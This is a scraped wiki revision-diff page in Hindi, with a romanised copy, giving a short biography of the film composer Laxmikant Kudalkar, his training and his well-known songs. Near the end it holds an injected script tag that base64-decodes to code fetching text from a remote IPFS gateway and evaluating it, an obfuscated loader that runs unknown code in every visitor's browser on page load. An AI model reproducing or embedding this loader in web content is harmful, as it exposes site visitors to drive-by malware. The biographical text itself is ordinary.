Difference between revisions of "लक्ष्मीकांत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "फिल्म" to "फ़िल्म")
Line 34: Line 34:
 
'''लक्ष्मीकांत शांताराम कुदलकर''' (जन्म: [[3 नवंबर]], [[1937]] बंबई - मृत्यु: [[25 मई]], [[1998]]) [[हिन्दी सिनेमा]] के प्रसिद्ध संगीतकार हैं जिनकी जोड़ी संगीतकार [[प्यारेलाल]] के साथ 'लक्ष्मीकांत प्यारेलाल' के नाम से मशहूर है।
 
'''लक्ष्मीकांत शांताराम कुदलकर''' (जन्म: [[3 नवंबर]], [[1937]] बंबई - मृत्यु: [[25 मई]], [[1998]]) [[हिन्दी सिनेमा]] के प्रसिद्ध संगीतकार हैं जिनकी जोड़ी संगीतकार [[प्यारेलाल]] के साथ 'लक्ष्मीकांत प्यारेलाल' के नाम से मशहूर है।
 
==संक्षिप्त परिचय==
 
==संक्षिप्त परिचय==
* लक्ष्मीकांत का जन्म 3 नवंबर 1937 में हुआ था। नौ वर्ष की छोटी सी उम्र मे हीं उनके पिता का निधन हो गया, जिसके कारण उन्हें बीच में ही अपनी पढ़ाई छोड़ देनी पड़ी। बचपन के दिनों से ही लक्ष्मीकांत का रुझान संगीत की ओर था और वह संगीतकार बनना चाहते थे।  
+
* लक्ष्मीकांत का जन्म 3 नवंबर 1937 में हुआ था। नौ वर्ष की छोटी सी उम्र मे ही उनके पिता का निधन हो गया, जिसके कारण उन्हें बीच में ही अपनी पढ़ाई छोड़ देनी पड़ी। बचपन के दिनों से ही लक्ष्मीकांत का रुझान [[संगीत]] की ओर था और वह संगीतकार बनना चाहते थे।  
* लक्ष्मीकांत ने [[संगीत]] की प्रारंभिक शिक्षा उस्ताद हुसैन अली से हासिल की। इस बीच घर की जरूरतों को पूरा करने के लिए लक्ष्मीकांत ने संगीत समारोह में हिस्सा लेना शुरू कर दिया। आगे चलकर वाद्य यंत्र मेंडोलियन बजाने की शिक्षा बालमुकुंद इंदौरकर से ली।
+
* लक्ष्मीकांत ने [[संगीत]] की प्रारंभिक शिक्षा 'उस्ताद हुसैन अली' से हासिल की। इस बीच घर की जरूरतों को पूरा करने के लिए लक्ष्मीकांत ने संगीत समारोह में हिस्सा लेना शुरू कर दिया। आगे चलकर वाद्य यंत्र मेंडोलियन बजाने की शिक्षा बालमुकुंद इंदौरकर से ली।
* लक्ष्मीकांत-प्यारेलाल की जोड़ी के रूप में फ़िल्म जगत में अपने संगीत का लोहा मनवाकर ही माने।  
+
* लक्ष्मीकांत-प्यारेलाल की जोड़ी के रूप में [[फ़िल्म जगत]] में अपने संगीत का लोहा मनवाकर ही माने।  
* अपने कैरियर की शुरुआत कल्याण जी आनन्द के बतौर सहायक के तौर पर उन्होंने मदारी, सत्ता बाज़ार, छलिया और दिल तेरा हम भी तेरे जैसी कई फ़िल्मों में काम किया।  
+
* अपने कॅरियर की शुरुआत में कल्याण जी आनन्द के सहायक के रूप में उन्होंने 'मदारी', 'सट्टा बाज़ार', 'छलिया' और 'दिल तेरा हम भी तेरे' जैसी कई फ़िल्मों में काम किया।  
* इस जोड़ी पर संगीत का ऐसा जुनुन था कि मशहूर निर्माता-निर्देशक बाबू भाई मिस्त्री की क्लासिकल फ़िल्म पारसमणि ने इनकी तकदीर बदल कर रख दी। फिर पीछे मुड़कर देखने का मौका हीं नहीं मिला।  
+
* इस जोड़ी पर संगीत का ऐसा जुनुन था कि मशहूर निर्माता-निर्देशक बाबू भाई मिस्त्री की क्लासिकल फ़िल्म 'पारसमणि' ने इनकी तक़दीर बदल कर रख दी। फिर पीछे मुड़कर देखने का मौक़ा ही नहीं मिला।  
 
====कुछ प्रसिद्ध गीत====
 
====कुछ प्रसिद्ध गीत====
 
लक्ष्मीकांत-प्यारेलाल की जोड़ी ने [[हिन्दी सिनेमा]] को बेहतरीन गीत दिये उनमें कुछ के नाम नीचे दिये गये हैं।  
 
लक्ष्मीकांत-प्यारेलाल की जोड़ी ने [[हिन्दी सिनेमा]] को बेहतरीन गीत दिये उनमें कुछ के नाम नीचे दिये गये हैं।  
Line 53: Line 53:
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 11:57, 28 July 2013

lakshmikaant
poora nam lakshmikaant shaantaram kudalakar
prasiddh nam lakshmikaant
janm 3 navanbar, 1937
janm bhoomi banbee (ab muanbee)
mrityu 25 mee, 1998
karm bhoomi muanbee
karm-kshetr sangitakar
mukhy rachanaean savan ka mahina, dil vil pyar vyar, bindiya chamakegi, chitthi aee hai adi
mukhy filmean milan, shagird, iantaqam, do raste, saragam, hiro, nam, tezab, khalanayak adi
puraskar-upadhi lakshmikaant-pyarelal ki jo di ne sat bar sarvashreshth sangitakar ka filmapheyar puraskar jita.
nagarikata bharatiy

lakshmikaant shaantaram kudalakar (janm: 3 navanbar, 1937 banbee - mrityu: 25 mee, 1998) hindi sinema ke prasiddh sangitakar haian jinaki jo di sangitakar pyarelal ke sath 'lakshmikaant pyarelal' ke nam se mashahoor hai.

sankshipt parichay

  • lakshmikaant ka janm 3 navanbar 1937 mean hua tha. nau varsh ki chhoti si umr me hi unake pita ka nidhan ho gaya, jisake karan unhean bich mean hi apani padhaee chho d deni p di. bachapan ke dinoan se hi lakshmikaant ka rujhan sangit ki or tha aur vah sangitakar banana chahate the.
  • lakshmikaant ne sangit ki praranbhik shiksha 'ustad husain ali' se hasil ki. is bich ghar ki jarooratoan ko poora karane ke lie lakshmikaant ne sangit samaroh mean hissa lena shuroo kar diya. age chalakar vady yantr meandoliyan bajane ki shiksha balamukuand iandaurakar se li.
  • lakshmikaant-pyarelal ki jo di ke roop mean film jagat mean apane sangit ka loha manavakar hi mane.
  • apane kॅriyar ki shuruat mean kalyan ji anand ke sahayak ke roop mean unhoanne 'madari', 'satta bazar', 'chhaliya' aur 'dil tera ham bhi tere' jaisi kee filmoan mean kam kiya.
  • is jo di par sangit ka aisa junun tha ki mashahoor nirmata-nirdeshak baboo bhaee mistri ki klasikal film 'parasamani' ne inaki taqadir badal kar rakh di. phir pichhe mu dakar dekhane ka mauqa hi nahian mila.

kuchh prasiddh git

lakshmikaant-pyarelal ki jo di ne hindi sinema ko behatarin git diye unamean kuchh ke nam niche diye gaye haian.

  • savan ka mahina... (film- milan)
  • dil vil pyar vyar... (film- shagird)
  • bindiya chamakegi... (film- do raste)
  • manhagaee mar gee... (film- roti kap da aur makan)
  • daphali vale... (film- saragam)
  • too mera hiro hai... (film- hiro )
  • yashoda ka nandalala... (film- sanjog)
  • chitthi aee hai... (film- nam)
  • ek do tin... (film- tezab)
  • choli ke pichhe kya hai... (film- khalanayak)


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh